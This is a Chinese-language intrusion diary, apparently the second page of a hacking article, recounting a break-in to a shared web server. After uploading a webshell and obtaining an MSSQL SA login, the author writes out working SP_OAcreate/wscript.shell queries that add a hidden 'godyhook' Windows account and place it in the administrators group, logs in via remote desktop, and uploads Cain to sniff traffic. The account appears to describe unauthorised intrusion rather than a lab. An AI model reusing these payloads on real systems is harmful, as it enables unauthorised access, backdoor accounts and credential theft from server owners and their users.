传上大马之后发现服务器竟然不支持中文..看起来很不舒服。不过能浏览一些盘，看了下WEB目录服务器上共有7。8个网站 都可以浏览，随便看了个站发现了一个SQL密码竟然跟我的是不一样的，于是重新用SQL连上，发现这回竟然是SA权限 如图4

但是在用xp_cmdshell存储过程执行命令的时候发现管理员把xplog70.dll给删掉了，我日。
但是没关系 偶们还有SP_OAcreate可以用 用SP_OAcreate一样可以执行系统命令
在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user godyhook hook /add'
就是利用SP_OAcreate来添加一个godyhook的系统用户 然后直接提升为管理员权限就OK了
提示命令完成成功 说明SP_OAcreate并没有被删除 如图5


但是连上终端的时候却提示我没有进入桌面的权限，着实郁闷了半天。后来好半天才想起来只是加了用户 但是并没有把
用户提升到管理员组，晕 真是大意
马上执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net localgroup administratos godyhook /add'
然后再连一下 发现成功进入服务器鸟..看了下 网站有几个 哈哈 如图
然后上传一个cain到服务器上 准备开始偶们的sniffer 哈哈. 文章着实没什么技术含量 也就是普通的入侵日记。 本来还有几篇文章的因为杂志的原因暂时不能发出来 嘿嘿
总结：对于拿到MSSQL帐号找WEB目录，可以利用玫瑰渗透PCSHARE的方法，快速查找！

上一页  [1] [2]